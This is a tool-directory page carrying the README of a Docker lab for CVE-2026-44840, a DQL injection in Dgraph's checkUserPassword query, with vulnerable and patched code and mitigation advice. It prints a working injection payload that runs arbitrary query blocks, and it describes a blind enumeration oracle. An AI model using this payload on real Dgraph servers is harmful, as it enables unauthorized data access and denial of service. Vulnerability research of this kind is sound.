Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-44840-poc — Docker lab reproducing CVE-2026-44840, a DQL injection in Dgraph's checkUserPassword GraphQL query, with exploit script and vulnerable vs patched comparison. | Kitploit
Tools/GitHubGitHub/isaca0315/cve-2026-44840-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingRed TeamingDatabase SecurityLabs & Practice
GitHubisaca0315/cve-2026-44840-poc

CVE-2026-44840-poc

Docker lab reproducing CVE-2026-44840, a DQL injection in Dgraph's checkUserPassword GraphQL query, with exploit script and vulnerable vs patched comparison.

1521 days agoNot yet reviewed
View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-44840 — PoC: Dgraph DQL Injection via checkUserPassword (GraphQL)

Docker lab that reproduces a real injection in Dgraph:

  • Vulnerable: dgraph/dgraph:v25.3.3
  • Patched : dgraph/dgraph:v25.3.4

Real CVE from 2026 · CVSS 3.1 7.5 (High) · CWE-943 (Improper Neutralization in Data Query Logic) · attributed to Kai Aizen (GHSA-q2m9-6jp9-c6mc, GO-2026-5837). For isolated and authorized lab environment only.

Context

checkUserPassword is the GraphQL query that Dgraph automatically generates for schemas of types with the @secret(field: "password") directive. In graphql/resolve/query_rewriter.go (≤ v25.3.3) the password was concatenated with fmt.Sprintf without escaping or parameterizing:

pwdVar := fmt.Sprintf(`checkpwd(%s, "%s")`, predicate, password)   // VULNERABLE

The attacker's password is inserted literally into the DQL:

pwd as checkpwd(User.password, "<attacker's password>")

The fix (v25.3.4, commit cee702c) parameterizes the value:

pwdVar = "$pwd0"                                  // FIX
// executes with &dgoapi.Request{Query: qry, Vars: map[string]string{"$pwd0": password}, ...}

What the PoC does

  1. Spins up two clusters Dgraph (zero+alpha): v25.3.3 and v25.3.4.

  2. Uploads the schema type User @secret(field: "password") and creates admin, alice, bob.

  3. Sends to checkUserPassword a password that breaks out of the DQL literal and adds an arbitrary query block:

    x")
    }
    injected(func: has(User.name)) {
      User.name
      User.email
      uid
    }
    #
    

    In v25.3.3 the injected { ... } block is parsed and executed server-side.

Observables

Testv25.3.3 (vulnerable)v25.3.4 (patched)
login with correct passwordOK (touched_uids 7)OK (touched_uids 7)
login with incorrect passwordnull (5)null (5)
injected password )} injected{...} #executes: touched_uids 14neutralized: 5
oracle: eq(User.name,"bob") injectedtouched_uids 7 (exists)5
oracle: eq(User.name,"nobody") injected5 (does not exist)5
dgraph alpha logshows the DQL with the injected blockparameterized DQL, no block

CVE impact: arbitrary DQL execution server-side → blind data enumeration (via touched_uids/timing), schema discovery (has(), eq()) and DoS via resource consumption by injecting expensive traversals (expand(_all_), recursions).

Usage

# 1) bring everything up, prepare schema/users and run the exploit
bash run.sh

# 2) only the exploit (if the lab is already prepared)
python3 exploit/exploit.py

# 3) set up the environment from scratch (pod / dump)
docker compose up -d
python3 setup/setup.py --alpha http://localhost:8180
python3 setup/setup.py --alpha http://localhost:8280

# 4) clean up
docker compose down            # keeps the volumes
docker compose down -v         # deletes the volumes (dgraph data)

Lab endpoints

ServiceHTTP GraphQLHTTP admingRPC alpha
alpha v25.3.3http://localhost:8180/graphqlhttp://localhost:8180/admin9180
alpha v25.3.4http://localhost:8280/graphqlhttp://localhost:8280/admin9280

Structure

CVE-2026-44840-poc/
├── docker-compose.yml     # 2 clusters: zero+alpha v25.3.3 / v25.3.4
├── schema.graphql         # type User @secret(field:"password")
├── run.sh                 # full orchestrator
├── REDTEAM.md             # red team guide: recon + step-by-step exploitation + OPSEC
├── setup/setup.py         # schema + users
└── exploit/exploit.py     # DQL injection and oracle

Offensive operational guide (reconnaissance, step-by-step exploitation, payloads, evidence and OPSEC): REDTEAM.md.

Payload details

The password travels as a GraphQL variable; the value that reaches the rewriter is not escaped and is inserted inside checkpwd(User.password, "..."). The payload:

x")            # closes the checkpwd literal and the function
}              # closes the checkPwd block
injected(...)  # new attacker root block
  { ... }
#              # comments out the rest of the template:  ")

The # prevents the template suffix (the closing " of checkpwd) from breaking the parsing.

Mitigation

  • Update to dgraph v25.3.4+.
  • Short version: always parameterize values in DQL (vars of dgoapi.Request), never interpolate input with fmt.Sprintf.
  • Enable index/ACL and do not expose GraphQL without authentication in production.# CVE-2026-44840-poc
Download Tool